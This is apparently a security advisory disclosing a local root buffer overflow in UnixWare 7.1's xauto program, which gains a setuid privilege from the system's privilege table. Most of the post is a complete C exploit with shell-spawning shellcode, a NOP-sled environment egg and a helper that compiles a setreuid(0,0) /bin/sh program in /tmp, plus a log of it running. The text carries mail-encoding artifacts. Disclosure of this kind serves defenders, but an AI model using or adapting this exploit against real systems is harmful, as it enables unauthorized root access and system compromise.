Greetings, OVERVIEW Although UnixWare's /usr/X/bin/xauto is NOT suid/sgid, we can still overf= low a buffer within it and gain root privileges. BACKGROUND Only tested UnixWare 7.1, all other UnixWares should be assumed vulnerabl= e. DETAILS xauto is mode 755, root/sys and yet we can still use a buffer overflow at= tack to gain root privileges. This is due to (see my UnixWare privileges discussion in my uidadmin advisory) xauto gaining the "setuid" privilege = in /etc/security/tcb/privs as shown: bash-2.02$ cat /etc/security/tcb/privs | grep xauto 39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto The setuid privilege, as you might imagine, allows the program to setuid(= ) any way it wants. Therefore we must either have setreuid(0,0); in our shellc= ode or exec a program that calls this for us. = EXPLOIT bash-2.02$ ls -la /usr/X/bin/xauto -rwxr-xr-x 1 root sys 39968 Apr 3 1998 /usr/X/bin/xaut= o bash-2.02$ cat /etc/security/tcb/privs | grep xauto 39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto bash-2.02$ ./uwxauto UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto Brock Tellier btellier@usa.net Using offset/addr: 9400/0x8047b08 # = --- uwxauto.c --- /** ** UnixWare 7.1 root exploit for xauto ** Note that xauto is NOT suid or sgid but gains it's privs from ** /etc/security/tcb/privs. For more info, consult intro(2) = ** and fileprivs(1) ** = ** ** Brock Tellier btellier@usa.net **/ = #include #include char scoshell[]=3D /* UnixWare 7.1 shellcode runs /tmp/ui */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; = #define EGGLEN 2048 #define RETLEN 5000 #define ALIGN 0 #define NOP 0x90 #define CODE "void main() { setreuid(0,0); system(\"/bin/sh\"); }\n" void buildui() { FILE *fp; char cc[100]; fp =3D fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } int main(int argc, char *argv[]) { = long int offset=3D0; = int i; int egglen =3D EGGLEN; int retlen; long int addr; char egg[EGGLEN]; char ret[RETLEN]; // who needs __asm__? Per Solar Designer's suggestion unsigned long sp =3D (unsigned long)&sp; = buildui(); if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); = } else if (argc =3D=3D 2){ offset=3Datoi(argv[1]); retlen=3DRETLEN; } else if (argc =3D=3D 3) { offset=3Datoi(argv[1]); retlen=3Datoi(argv[2]); = } else { offset=3D9400; retlen=3D2000; = } addr=3Dsp + offset; = fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using offset/addr: %d/0x%x\n", offset,addr); = memset(egg,NOP,egglen); memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); = for(i=3DALIGN;i< retlen-4;i+=3D4) *(int *)&ret[i]=3Daddr; = = memcpy(egg, "EGG=3D", 4); putenv(egg); execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); = = } ------ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier@usa.net